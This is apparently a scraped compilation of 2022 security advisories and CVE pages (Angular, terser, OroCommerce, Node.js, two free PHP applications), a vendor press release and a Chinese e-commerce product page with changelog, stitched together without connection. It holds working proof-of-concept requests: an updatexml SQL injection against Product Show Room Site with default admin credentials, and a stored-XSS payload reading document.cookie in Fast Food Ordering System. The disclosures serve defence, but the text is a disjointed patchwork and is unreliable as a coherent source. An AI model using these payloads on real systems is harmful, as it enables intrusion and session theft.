All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

NPM package [angular](https://www.npmjs.com/package/angular) is deprecated. Those who want to receive security updates should use the actively maintained package [@angular/core](https://www.npmjs.com/package/@angular/core).

**Angular (deprecated package) Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 16, 2022 • Updated Jul 20, 2022

GHSA-prc3-vjfx-vhm9: Angular (deprecated package) Cross-site Scripting

The package terser before 4.8.1, from 5.0.0 and before 5.14.2 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure usage of regular expressions.



@@ -30,10 +30,10 @@ regexp\_2: { unsafe: true, } input: { console.log(JSON.stringify("COMPASS? Overpass.".match(new RegExp("(\[Sap\]+)", "ig")))); console.log(JSON.stringify("COMPASS? Overpass.".match(new RegExp("(pass)", "ig")))); } expect: { console.log(JSON.stringify("COMPASS? Overpass.".match(/(\[Sap\]+)/gi))); console.log(JSON.stringify("COMPASS? Overpass.".match(/(pass)/gi))); } expect\_stdout: '\["PASS","pass"\]' } @@ -44,10 +44,10 @@ unsafe\_slashes: { unsafe: true } input: { console.log(new RegExp("^https://")) console.log(new RegExp("^https//")) } expect: { console.log(/^https:\\/\\//) console.log(/^https\\/\\//) } } unsafe\_nul\_byte: { @@ -75,3 +75,16 @@ inline\_script: { } expect\_exact: '/\* <\\\\/script> \*/\\n/\[<\\\\/script>\]/;' }  
regexp\_no\_ddos: { options \= { unsafe: true, evaluate: true } input: { console.log(/(b+)b+/.test("bbb")) console.log(RegExp("(b+)b+").test("bbb")) } expect: { console.log(/(b+)b+/.test("bbb")) console.log(RegExp("(b+)b+").test("bbb")) } expect\_stdout: \["true", "true"\] }

CVE-2022-25858: fix potential regexp DDOS · terser/terser@a4da734

# Impact
Due to insufficient class name validation in GrapeJS library it's possible to add executable JS code in class name through Selector Manager

# Relates to
 - [https://github.com/artf/grapesjs/issues/4411](https://github.com/artf/grapesjs/issues/4411)

# Patch
Update GrapeJS dependency to >=[v0.19.5](https://github.com/artf/grapesjs/releases/tag/v0.19.5)


**OroCommerce vulnerable to XSS when adding class name to Selector Manager on pages that use GrapeJS editor**

Moderate severity GitHub Reviewed Published Jul 15, 2022 in oroinc/orocommerce • Updated Jul 15, 2022

GHSA-6f85-3f8q-qc94: OroCommerce vulnerable to XSS when adding class name to Selector Manager on pages that use GrapeJS editor

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

Vul\_Author: XuBoyu

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/classes/Master.php?f=delete\_product

Vulnerability location: /psrs/classes/Master.php?f=delete\_product, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /psrs/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/psrs/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32416: bug_report/SQLi-1.md at main · Estbonxby/bug_report

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

CVE-2022-32318: Fast Food Ordering System 1.0 Cross Site Scripting ≈ Packet Storm

Developers can now rest assured that the code they are using, as well as their GitHub accounts, are safe.

TEL AVIV, Israel , July 14, 2022 /PRNewswire/ -- Scribe Security, a leading software supply chain security solutions provider, announced today the release of Scribe Integrity, a code integrity validator that authenticates open-source and proprietary source code, and an integral building block of its platform solving the software supply chain security challenge. Scribe Integrity provides developers with an added layer of visibility, allowing developers peace of mind that the code they are using is safe. Scribe is simultaneously introducing its open-source Github security project, GitGat.

In 2021, software supply chain (SSC) attacks more than tripled, with recent attacks on SolarWinds, CodeCov, and Log4Shell underscoring the growing risk of such attacks to enterprises.

DevSecOps and security teams often focus on software vulnerabilities, overlooking the risk of tampering with software in the build process. Scribe bridges this gap in a practical manner by providing a convenient work tool that automatically reports integrity validation within a trusted software bill of materials SBOM.

Scribe leverages the principle of 'hash everything, sign everything', utilizing open-source intelligence that it collects on open-source dependencies. In this first release, Scribe's solution addresses the widely used Node.js and the popular npm package manager, which have recently suffered from a multitude of attacks.

Scribe's additional release, GitGat, is a Policy-as-Code tool, utilizing Open Policy Agent (OPA), an open source project, that addresses users' security posture. GitGat allows users to periodically run reports to gain insight into the changing security landscape of the organization. As GitGat evolves, it will cover more parts of the CI/CD toolchains.

"As software supply chains are an overlooked corner of the cyber world, they have become an increasingly attractive attack vector for hackers," said Scribe CEO and Co-founder, Rubi Arbel. "We are excited to be introducing a developer-first, practical tool that will give DevSecOps and security practitioners the assurance they need to trust the software they build and use."

**About Scribe**

Founded by cyber security and cryptography experts, Scribe Security develops a novel software supply chain security solution to increase trust in software products. For more information visit https://scribesecurity.com/

Scribe Security Releases Code Integrity Validator Alongside Github Security Open Source Project

The llhttp parser in the http module in Node.js does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).

CVE-2022-32214

The llhttp parser in the http module in Node v17.6.0 does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

Updates are now available for the v18.x, v16.x, and v14.x Node.js release lines for the following issues.

The llhttp parser in the http module does not correctly parse and validate Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

More details will be available at CVE-2022-32213 after publication.

Thank you to Zeyu Zhang (@zeyu2001) for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.
*   llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js

The llhttp parser in the http module does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).

More details will be available at CVE-2022-32214 after publication.

Thank you to Zeyu Zhang (@zeyu2001) for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.
*   llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js

The llhttp parser in the http module does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

More details will be available at CVE-2022-32215 after publication.

Thank you to Zeyu Zhang (@zeyu2001) for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.
*   llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js

The IsAllowedHost check can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid or not. When an invalid IPv4 address is provided (for instance 10.0.2.555 is provided), browsers (such as Firefox) will make DNS requests to the DNS server, providing a vector for an attacker-controlled DNS server or a MITM who can spoof DNS responses to perform a rebinding attack and hence connect to the WebSocket debugger, allowing for arbitrary code execution. This is a bypass of CVE-2021-22884.

More details will be available at CVE-2022-32212 after publication.

Thank you to Axel Chong for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.

This vulnerability can be exploited if the victim has the following dependencies on Windows machine:

*   OpenSSL has been installed and “C:\\Program Files\\Common Files\\SSL\\openssl.cnf” exists.

Whenever the above conditions are present, node.exe will search for providers.dll in the current user directory. After that, node.exe will try to search for providers.dll by the DLL Search Order in Windows.

It is possible for an attacker to place the malicious file providers.dll under a variety of paths and exploit this vulnerability.

More details will be available at CVE-2022-32223 after publication.

Thank you to Yakir Kadkoda from Aqua Security for reporting this vulnerability.

Impacts:

*   All versions of the 16.x, and 14.x releases lines.

Note:

*   This is a breaking change that has been made to the v14.x, v16.x, and v18.x releases lines.

Node.js can use an OpenSSL configuration file by specifying the environment variable OPENSSL_CONF, or using the command line option --openssl-conf, and if none of those are specified will default to reading the default OpenSSL configuration file openssl.cnf. **Node.js will only read a section that is by default named nodejs_conf**.

If your installation was using the default openssl.cnf file and is affected by this breaking change you can fall back to the previous behavior by:

*   Adding --openssl-shared-config to the command line (Node.js 18.5.0 only); or
*   Creating a new nodejs_conf section in that file and copying the contents of the default section into the new nodejs_conf section.

When Node.js starts on linux based systems, it attempts to read /home/iojs/build/ws/out/Release/obj.target/deps/openssl/openssl.cnf, which ordinarily doesn't exist. On some shared systems an attacker may be able create this file and therefore affect the default OpenSSL configuration for other users.

Thank you to Michael Scovetta from the OpenSSF Alpha-Omega project for reporting this vulnerability.

Impacts:

*   Node.js 18.x

AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed.

Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.

**Downloads and release details**

*   Node.js v14.20.0 (LTS)
*   Node.js v16.16.0 (LTS)
*   Node.js v18.5.0 (Current)

The Node.js Security Releases will be available on, or shortly after, Thursday, July 7th, 2022.

With respect to the vulnerabilities in the OpenSSL Security releases of Jul 5th 2022 affects Node.js v18.x, v16.x, and v14.x.

*   Node.js is affected by **one** MODERATE vulnerability on Windows 32-Bit x86.

The security release will be delayed so that we can incorporate the the updated OpenSSL versions. We will post another update once we have an updated target for the release date.

Our assessment of the security advisory is:

This vulnerability affects OpenSSL 3.0.4 users. However, Node.js has not shipped any version that used OpenSSL 3.0.4. Therefore, Node.js is not affected.

This vulnerability affects Windows 32-Bit x86 users using AES OCB encryption. The serverity is MODERATE.

The OpenSSL versions 1.1.1q and 3.0.5 will be released July, 5th 2022. The announcement can be found here: https://mta.openssl.org/pipermail/openssl-announce/2022-July/000229.html

The Node.js team will evaluate the OpenSSL changes when they are available and then announce the new target date by Thursday or earlier.

The Node.js project will release new versions of the 14.x, 16.x, and 18.x releases lines on or shortly after Tuesday, July 5th, 2022 in order to address:

*   Three medium severity issues.
*   Two high severity issues.

The 18.x release line of Node.js is vulnerable to three medium severity issues and one high severity issues.

The 16.x release line of Node.js is vulnerable to three medium severity issues and two high severity issues.

The 14.x release line of Node.js is vulnerable to three medium severity issues and two high severity issues.

Releases will be available on, or shortly after, Tuesday, July 5th, 2022.

However, when details of the OpenSSL defects are released on the 5th, our team will be making a more detailed assessment on the likely severity for Node.js users.

The OpenSSL release may delay the Node.js release date. See OpenSSL Security Release

Please monitor the **nodejs-sec** Google Group for updates, including a decision within 24 hours after the OpenSSL release regarding release timing, and full details of the defects upon eventual release: https://groups.google.com/forum/#!forum/nodejs-sec

The current Node.js security policy can be found at https://nodejs.org/en/security/. Please follow the process outlined in https://github.com/nodejs/node/blob/main/SECURITY.md if you wish to report a vulnerability in Node.js.

Subscribe to the low-volume announcement-only nodejs-sec mailing list at https://groups.google.com/forum/#!forum/nodejs-sec to stay up to date on security vulnerabilities and security-related releases of Node.js and the projects maintained in the nodejs GitHub organization.

CVE-2022-32215: July 7th 2022 Security Releases | Node.js

A OS Command Injection vulnerability exists in Node.js versions <14.20.0, <16.20.0, <18.5.0 due to an insufficient IsAllowedHost check that can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid before making DBS requests allowing rebinding attacks.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

The Node.js inspector, in 6.x and later is vulnerable to a DNS rebinding attack which could be exploited to perform remote code execution. An attack is possible from malicious websites open in a web browser on the same computer, or another computer with network access to the computer running the Node.js process. A malicious website could use a DNS rebinding attack to trick the web browser to bypass same-origin-policy checks and to allow HTTP connections to localhost or to hosts on the local network. If a Node.js process with the debug port active is running on localhost or on a host on the local network, the malicious website could connect to it as a debugger, and get full code execution access.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   CONFIRM:https://nodejs.org/en/blog/vulnerability/march-2018-security-releases/
*   URL:https://nodejs.org/en/blog/vulnerability/march-2018-security-releases/
*   CONFIRM:https://support.f5.com/csp/article/K63025104?utm\_source=f5support&amp;utm\_medium=RSS
*   URL:https://support.f5.com/csp/article/K63025104?utm\_source=f5support&amp;utm\_medium=RSS
*   MISC:https://www.oracle.com//security-alerts/cpujul2021.html
*   URL:https://www.oracle.com//security-alerts/cpujul2021.html

Assigning CNA

Node.js

Date Record Created

**20180215**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20180215)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-32212: CVE - CVE-2018-7160

Electronic mall system 1.0_build20200203 is affected vulnerable to SQL Injection.

**产品优势**

 多端展示

电脑/WAP/安卓/IOS/各平台小程序

 商家入驻

普通会员用户也可以发布商品/文章

 回收站

即使数据不小心误删，也可无忧找回

 快捷登录

支持QQ/微信等快捷登录，一键注册

 SEO优化

支持伪静态/sitemap/自定义关键词

**套餐选择 / Pricing**

多种套餐选择，即开即用

*   **标准版（598元/永久）**
    
    *   版权文字：自动去除
    *   随机广告：自动去除
    *   文章条数：无限制
    *   商品个数：无限制
    *   缺货提醒/快捷登录/回收站/免登录购买
    *   运行端：网站部分
    
    立即开通
*   **高级版（798元/永久）**
    
    *   版权文字：自动去除
    *   随机广告：自动去除
    *   文章条数：无限制
    *   商品个数：无限制
    *   缺货提醒/快捷登录/回收站/免登录购买
    *   运行端：网站+APP+小程序
    
    立即开通
*   **站群版（998元/永久）**
    
    *   版权文字：自动去除
    *   随机广告：自动去除
    *   文章条数：无限制
    *   商品个数：无限制
    *   缺货提醒/快捷登录/回收站/免登录购买
    *   运行端：网站+APP+小程序+站群
    
    立即开通

**模板库不断更新，模板尽情下载**

T1 - 电子商城模板（PC/WAP） 演示

T11 - 电子商城模板（PC） 演示

T5 - 资源下载模板（PC） 演示

T14 - 素材下载模板（PC） 演示

T15 - 游戏资源模板（PC/WAP） 演示

T16 - 知识付费模板（PC/WAP） 演示

T2 - 新闻门户模板（PC/WAP） 演示

T4 - 企业官网模板（PC/WAP） 演示

T3 - 个人博客模板（PC/WAP） 演示

更新日志

\[20220529\] 修复：修复了收银台无法正常收集订单信息的问题  
\[20220529\] 优化：优化了由于用户误删系统内置会员帐号导致系统无法正常运行的问题  
\[20220417\] 修复：修复了部分外部js导致页面加载慢的问题  
\[20220417\] 修复：修复了在已登录状态下点击注册按钮页面报错的问题  
\[20220417\] 修复：修复了部分主机环境下不支持下载中文文件名的问题  
\[20220417\] 优化：优化了程序，防止用户误删文件夹导致后台登录卡顿  
\[20220417\] 优化：后台直接上传图片可以按照日期归类  
\[20220417\] 修复：修复了文章模块采集微信公众号文章内容无效的问题  
\[20220413\] 修复：修复了会员中心充值界面虎皮椒接口错误的问题  
\[20220322\] 修复：修复了一处XSS漏洞  
\[20220223\] 修复：修复了会员免费下载次数不自动更新的问题  
\[20220223\] 修复：修复了使用手机支付文章后，电脑端网页不自动跳转的问题  
\[20220223\] 优化：对留言板功能进行了优化，防止用户插入代码  
\[20220209\] 修复：修复了站群版部分域名无法使用微信支付的问题  
\[20220209\] 修复：修复了后台登录时邮箱验证码不填写也可登录的问题  
\[20220118\] 修复：修复了后台自定义设置无法保存的问题  
\[20220107\] 优化：优化了实物商品购买后的界面显示  
\[20220107\] 修复：后台页面修复了部分css和js无法正常加载的问题  
\[20211225\] 修复：修复了收银台使用IOS系统进行支付宝支付时无法正常打开的问题  
\[20211225\] 新增：增加了商品，文章，订单导出EXCEL的功能  
\[20211225\] 修复：修复了手机端无法正常使用QQ登录的问题  
\[20211120\] 优化：优化虎皮椒支付接口对微信手机端支付流程  
\[20211120\] 新增：在线课程模块新增笔记功能  
\[20211120\] 优化：分站功能的商户平台新增支持绑定多个域名，使用分号隔开  
\[20211120\] 修复：修复了商品名称有特殊字符时，无法正常付款的问题  
\[20211120\] 修复：后台短信平台进行了迁移，用户需联系客服获取新的ID  
\[20211120\] 修复：修复了APP端和小程序端部分课程无法正常显示介绍的问题  
\[20211120\] 优化：新增了显示或关闭地图的功能  
\[20211120\] 修复：修复了开启缓存后无法正常购买的问题  
\[20211015\] 修复：修复了视频播放器无法判断部分不规则格式视频的问题  
\[20211015\] 修复：修复了后台驳回提现时重复点击导致多次退款的问题  
\[20211015\] 新增：支付接口新增了PAYPAL的个人收款接口  
\[20211015\] 新增：新增了限制用户免费下载次数的功能，普通、VIP、SVIP会员可分别设置  
\[20211015\] 修复：修复了使用虎皮椒充值时不跳转会员中心的问题  
\[20211015\] 优化：优化会员中心顶部按钮逻辑，可以更快直到明细列表  
\[20211015\] 优化：前台后台的资金明细和积分明细分开显示，更加清晰明了  
\[20211015\] 新增：后台新增统计会员余额和积分总和的功能  
\[20211015\] 新增：新增了批量操作会员的功能，包括增加余额、积分、删除、停用等功能  
\[20210928\] 修复：修复了后台卡密列表在会员不对应时报错的问题  
\[20210928\] 优化：针对未正确配置邮箱接口无法登录后台的问题进行了优化  
\[20210810\] 修复：修复了部分情况下会员中心充值界面不显示充值卡框的问题  
\[20210810\] 新增：邀请VIP开通增加了三级分销功能，与商品分销共用分成比例  
\[20210810\] 新增：虚拟评价功能增加了仅增加销量，不增加评价的功能  
\[20210810\] 新增：商品模块增加了仅限永久VIP购买的选项  
\[20210810\] 修复：修复了会员中心登录注册界面不居中的问题  
\[20210810\] 修复：修复了后台登录时部分错误提示未正确显示的问题  
\[20210810\] 修复：修复了在IE内核浏览器下计算验证码无法正常使用的问题  
\[20210810\] 修复：修复了使用微信内置浏览器充值时资金错误的问题  
\[20210810\] 优化：卡密分类列表可以直接显示ID，方便填写发货内容时查看  
\[20210810\] 优化：卡密分类列表增加了隐藏按钮的功能，防止小屏显示器遮挡信息  
\[20210709\] 修复：修复了卖家中心订单列表重复显示的问题  
\[20210709\] 新增：卡密分类增加了二级分类，排序功能，分类折叠功能  
\[20210709\] 新增：新增了虎皮椒的支付宝接口  
\[20210709\] 新增：新增了支付宝商户新版支付接口，逐步淘汰旧版支付接口  
\[20210709\] 优化：为防止当面付的密钥填写错误，程序增加了字符数的验证  
\[20210709\] 新增：手机端模板也增加了自定义设置的功能  
\[20210709\] 新增：商品模块新增商品浏览量字段，可以在后台手动设置浏览量  
\[20210701\] 修复：修复了带参数后缀的视频地址无法正常播放的问题  
\[20210701\] 优化：优化了收银台界面，防止用户使用余额支付时不小心多次扣款  
\[20210624\] 新增：新闻模块新增了免登录购买的开关  
\[20210624\] 优化：优化了后台菜单栏的布局  
\[20210607\] 新增：支付接口新增了易支付平台的支付方式  
\[20210607\] 新增：商品模块新增限时特惠的功能（需配合模板更新）  
\[20210607\] 新增：课程播放新增对m3u8格式的支持  
\[20210517\] 新增：小程序端和APP端文章/课程/商品介绍内容新增了文字长按复制功能  
\[20210517\] 新增：小程序端新增了余额支付和网页支付的选项  
\[20210517\] 新增：优化了PAYJS支付接口在手机浏览器的支付体验  
\[20210517\] 新增：新增了一键清理虚拟评价的功能  
\[20210517\] 新增：订单新增了已退款的状态  
\[20210517\] 优化：优化了会员中心导航，方便会员回到网站首页  
\[20210517\] 优化：优化了后台文章和产品列表页，增加可显示编辑发布日期，可按日期排序  
\[20210517\] 优化：优化了会员中心充值界面，新增了几种支付方式  
\[20210517\] 新增：后台订单管理新增了备注功能和修改订单状态的功能  
\[20210430\] 新增：会员表和订单表新增了导出为excel的功能  
\[20210430\] 新增：订单新增了获取用户省份城市和客户端的功能，方便商家收集信息  
\[20210430\] 新增：发货页增加了备注功能，可以引导用户如何使用产品  
\[20210430\] 新增：购物页增加了对手机号码格式的验证  
\[20210430\] 新增：新增了采集其他发货100网站数据的功能  
\[20210430\] 新增：增加了批量新增会员帐号的的功能  
\[20210430\] 新增：支付方式加入极支付/虎皮椒支付，可使用个人收款码收款  
\[20210409\] 修复：修复了会员中心找回密码页面验证码错误的问题  
\[20210409\] 优化：因滑动块验证经常加载不出，将验证改为数字算式  
\[20210409\] 修复：修复了有大量文字的发货内容时订单错误的问题  
\[20210308\] 修复：修复了已知的SQL和XSS漏洞  
\[20210308\] 优化：对于有大量文字的发货内容，改为下载文档的方式  
\[20210308\] 新增：新增商户可以发布在线课程的功能  
\[20210301\] 新增：手机版会员中心底部和手机端模板底部加入了tabbar导航  
\[20210301\] 新增：菜单模块加入了菜单图标的功能，可以在部分模板上使用  
\[20210301\] 新增：后台文章和产品加入了按照店铺名称和商家名称搜索的功能  
\[20210222\] 新增：文章模块新增了仅限VIP购买的功能，可以一键开启或关闭  
\[20210125\] 新增：文章分类和商品分类新增了图标功能，可在移动端显示的更美观  
\[20210125\] 优化：模板设计增加了通用顶部和通用底部页面，方便加入外部代码  
\[20210125\] 优化：后台文章和商品新增了排序功能，方便管理  
\[20210104\] 新增：商品模块新增了兑换码取货的功能  
\[20201207\] 新增：后台会员管理界面新增了会员注册时间、商户开通时间、VIP开通时间等信息  
\[20201207\] 新增：加入了防恶意购买功能，可以设置时间间隔  
\[20201207\] 新增：新增网站缓存功能，可以提高网站加载速度  
\[20201207\] 新增：为有时限的订单加入了到期天数显示及到期邮件/短信提醒  
\[20201207\] 修复：修复了码支付自动加金额后回调失败的问题  
\[20201207\] 新增：加入了APP端独立的QQ快捷登录和微信快捷登录的开关  
\[20201207\] 新增：后台菜单管理新增了隐藏菜单的设置  
\[20201207\] 新增：微信小程序增加了分享到朋友圈的功能，需重新生成  
\[20201130\] 新增：后台新增了积分获取设置和积分兑换设置  
\[20201130\] 新增：新增了每日签到得积分功能  
\[20201130\] 新增：新增商品规格时支持上传规格图片  
\[20201130\] 优化：前台搜索页面增加了分页功能，防止卡顿  
\[20201124\] 新增：商品模块、文章模块、课程模块增加了开关按钮  
\[20201124\] 优化：后台回收站增加了分页功能防止单页加载过多内容造成卡顿  
\[20201124\] 修复：修复了在开启https后无法正常生成APP源码包的问题  
\[20201117\] 新增：课程模块除MP4视频之外，增加了对MP3音频和TXT文档的支持  
\[20201117\] 新增：商品规格加入了乘价的功能，方便价格翻倍时设置  
\[20201117\] 修复：修复了部分版本的当面付在未支付的情况下自动发货的问题  
\[20201117\] 优化：邮件发送功能增加了时间限制，防止滥用被限制  
\[20201117\] 新增：小程序及APP增加了相应的课程模板  
\[20201102\] 新增：新增了在线视频课程模块，支持分节购买和全套购买  
\[20201102\] 优化：微信支付/QQ钱包/PAYJS隐藏了支付时订单标题，防止拦截  
\[20201102\] 优化：留言新增了邮件提醒和后台的红点提醒  
\[20201102\] 优化：更新了码支付网关，解决了微信内支付被拦截的问题  
\[20201102\] 新增：会员注册功能新增了必填项功能，可以选择一项或多项必填  
\[20201026\] 新增：新增了商品和文章阅读的浏览历史功能  
\[20201026\] 新增：主站可以选择只展示主站或展示全部（主站+分站）内容  
\[20201019\] 新增：后台新增了在线编辑模板功能  
\[20201019\] 优化：小程序及APP新增加入了多规格购买功能  
\[20201010\] 优化：对SQL语句进行了优化，代码进行了精简  
\[20201010\] 新增：发货页面支持将发货内容生成二维码图片，方便保存  
\[20200921\] 新增：商品模块新增商品规格功能，并且可以设置各项独立发货内容  
\[20200921\] 修复：修复了对部分特殊命名的文件上传失败的问题  
\[20200921\] 修复：修复了一个文件任意读取漏洞\[高危\]  
\[20200914\] 优化：商品模块接入进货价功能，方便站长统计销售及利润  
\[20200914\] 优化：后台模板管理页面增加了代码运行允许时长，防止网速慢造成下载失败  
\[20200907\] 优化：商户中心卡密分类页加入显示库存及补货按钮  
\[20200907\] 优化：商户中心卡密列表页支持显示已发放/未发放功能  
\[20200907\] 新增：免费版后台首页加入广告区及购买授权优惠信息  
\[20200831\] 新增：新增支持子管理员修改自己的密码和头像  
\[20200824\] 优化：管理员驳回用户提现时可以通过邮件通知到用户  
\[20200824\] 修复：修复了使用微信支付/PAYJS的JSAPI接口下，收货信息无法正确写入的问题  
\[20200824\] 修复：修复了后台的几个文案错误  
\[20200824\] 新增：虚拟商品发货功能增加支持上传附件，可以直接发货附件  
\[20200810\] 新增：余额提现功能增加了驳回功能，同时可设置回复信息  
\[20200803\] 优化：订单查询功能增加了对mysql5.7及以上版本的支持  
\[20200803\] 优化：优化了获取客户端IP地址的方式，可以获取到真实IP  
\[20200803\] 新增：支付方式加入QQ钱包支付方式  
\[20200803\] 优化：对字节跳动小程序支付功能进行了完善  
\[20200803\] 优化：对订单金额进行了校验，保留两位小小数，防止金额小数过多导致支付失败  
\[20200727\] 优化：优化了后台顶部的提醒功能  
\[20200727\] 新增：后台订单管理加入了查询功能，支持通过订单标题/会员名查询  
\[20200727\] 修复：修复了子目录安装程序时，管理员权限设置无效的问题  
\[20200727\] 新增：为会员开通VIP的费用增加了分销佣金的提成  
\[20200727\] 修复：修复了会员中心分站焦点图无法删除的问题  
\[20200713\] 优化：增加了对订单的金额和数量加强了验证，防止出现负数  
\[20200713\] 新增：站群版分站支持仅展示自己店铺商品（需配合更新模板）  
\[20200713\] 新增：新增站群版分站开通VIP会员提成  
\[20200713\] 新增：站群版分站支持设置和主站不同模板  
\[20200713\] 新增：管理员支持设置模块权限，方便设置子管理员  
\[20200713\] 新增：为入驻商家加入了店铺页面（需配合更新模板）  
\[20200713\] 新增：实物商品发货可以设置收件信息开关，收件人，手机，地址可开启部分或全部  
\[20200713\] 新增：新增了百度站长平台页面推送功能，可以加速页面收录

Tag

#js